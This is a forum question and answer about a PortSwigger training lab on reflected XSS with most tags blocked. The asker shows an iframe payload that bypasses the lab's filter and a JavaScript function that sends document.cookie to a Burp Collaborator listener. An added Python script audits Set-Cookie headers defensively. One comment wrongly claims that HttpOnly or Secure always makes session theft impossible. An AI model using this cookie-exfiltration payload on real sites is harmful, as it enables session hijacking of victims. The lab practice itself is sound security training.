
I am busy with the PortSwigger lab studies, doing "Reflected XSS into HTML context with most tags and attributes blocked".

I successfully fire print() on myself and on the simulated victim, but for extra practice in preparing for the Burp Suite exam, I am trying to extend my exploit server body code to steal the victim's cookie out of band via Burp Collaborator. The simulated victim clicks on any link sent.

I get a hit with the exploit server body code below, but no document.cookie value in my OOB listening server. Is it possible, or is it that the victim's cookie has HttpOnly set?

function StealCookies() {
  document.write('<img src="http://BurpCol.oastify.com?cookieStealer="+document.cookie>');
}

<iframe src="https://burp-lab-id.web-security-academy.net/?search=%22%3E%3Cbody%20onresize=StealCookies()%3E" onload=this.style.width='1000px'>

My JavaScript skills are very basic; I would appreciate any feedback on making a successful cookie-stealer exploit, as the labs just do alert() or print().

Link to lab: https://portswigger.net/web-security/cross-site-scripting/contexts/lab-html-context-with-most-tags-and-attributes-blocked

Thanks J

schroeder
Juan

1 Answer


You can check for HttpOnly or Secure on the cookie. Check the response header to be sure.

  • I have to assume the cookie is set "HttpOnly" and this is why I cannot steal it, but the lab was not made for what I want to test. – Juan Jun 18 '22 at 18:56
  • Just a question: what is the purpose of the laboratory? The HttpOnly or Secure header always guarantees the protection of the cookie, making it impossible to steal a victim's session. – Jhon Laurence Jun 18 '22 at 21:44
  • To solve this PortSwigger lab with the Burp Suite proxy tool, perform a cross-site scripting attack that bypasses the WAF and calls the print() function, after delivering the exploit to the simulated victim, who clicks on the link to trigger the payload. – Juan Jun 19 '22 at 18:10
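As an added example (not code from the question, the answer or the lab), here is a small Python check of the kind the answer suggests: it parses Set-Cookie response headers and reports which cookies lack HttpOnly, Secure and SameSite, HttpOnly being the attribute that keeps a cookie out of document.cookie. The sample headers are constructed.

```python
# Added example: audit Set-Cookie response headers for the attributes that
# limit what an injected script can do with a session cookie. HttpOnly keeps
# the cookie out of document.cookie; Secure restricts it to HTTPS transport;
# SameSite limits when it is sent cross-site.

def parse_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header value into name, value and attributes."""
    parts = [p.strip() for p in header.split(";")]
    # Only the first "=" separates name from value; the value may contain "=".
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        # Flag attributes (Secure, HttpOnly) carry no value; store True.
        attrs[key.strip().lower()] = val.strip() or True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_cookie(header: str) -> dict:
    """Report which protective attributes a Set-Cookie header carries."""
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    return {
        "name": cookie["name"],
        "httponly": "httponly" in attrs,
        "secure": "secure" in attrs,
        "samesite": attrs.get("samesite"),  # None when absent
        # Without HttpOnly, any script running in the page can read it.
        "readable_by_script": "httponly" not in attrs,
    }


# Constructed sample headers (not captured from the lab).
SAMPLE_HEADERS = [
    "session=abc123; Secure; HttpOnly; SameSite=Lax",
    "tracking=xyz; Path=/",
]


def audit_all(headers=SAMPLE_HEADERS) -> list:
    """Audit every header in the list and return the findings."""
    return [audit_cookie(h) for h in headers]


if __name__ == "__main__":
    for finding in audit_all():
        print(finding)
```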